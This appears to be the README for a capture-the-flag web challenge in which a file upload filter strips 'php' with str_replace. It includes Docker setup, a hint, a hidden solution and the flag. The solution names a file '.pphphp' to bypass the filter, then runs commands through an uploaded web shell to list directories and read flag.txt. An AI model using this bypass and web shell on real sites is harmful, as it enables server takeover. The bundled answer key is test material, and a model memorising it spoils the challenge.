# Web Medium - PHP upload
## Description
php upload challenge 

## Author(s)
- RPScylla

## How to build/host
- Docker image
- Text instructions on CTFd
- Hint on CTFd

### Docker compile commands
```
#sudo docker build --rm -t php-upload .
#sudo docker run -d -it --restart always --name php-upload -p 8080:80 php-upload
```

### Text instructions
> The pentesthub has this awesome fileshare website. Im sure it is super secure!

### Hint
> sometimes stuff is :none;

## Solution
<details>
<summary>Click to show</summary>
<p>

When you upload a `.php` file the following message shows: `Php detected in filename, censored`<br>
If we inspect elements a little closer we see: 
```
<div class="alert alert-warning" role="alert">Php detected in filename, censored</div>
<p style="display:none;">str_replace("php", "", $baseName)</p>
```

This gives us a qlue to how to bypass the security feature.<br>
Naming the file `.pphphp` removes the inner `php` keeping the outer `php`: `.p(php)hp`.<br>
Uploading a file with scripts in it like `poc.pphphp` we can navigate trough the server.<br>

With `http://{ip}:{port}/uploads/{sha1}.php?q=ls` we can see the current directory.<br>
With `http://{ip}:{port}/uploads/{sha1}.php?q=ls%20../` we can see the directory above contains `css index.php js uploads`.<br>
With `http://{ip}:{port}/uploads/{sha1}.php?q=ls%20../../` we can it contains `flag.txt public`.<br>
Using `http://{ip}:{port}/uploads/{sha1}.php?q=cat%20../../flag.txt` we get the flag!

</p>
</details>

### Flag
`PTH{n3v3r_7hru57_php}`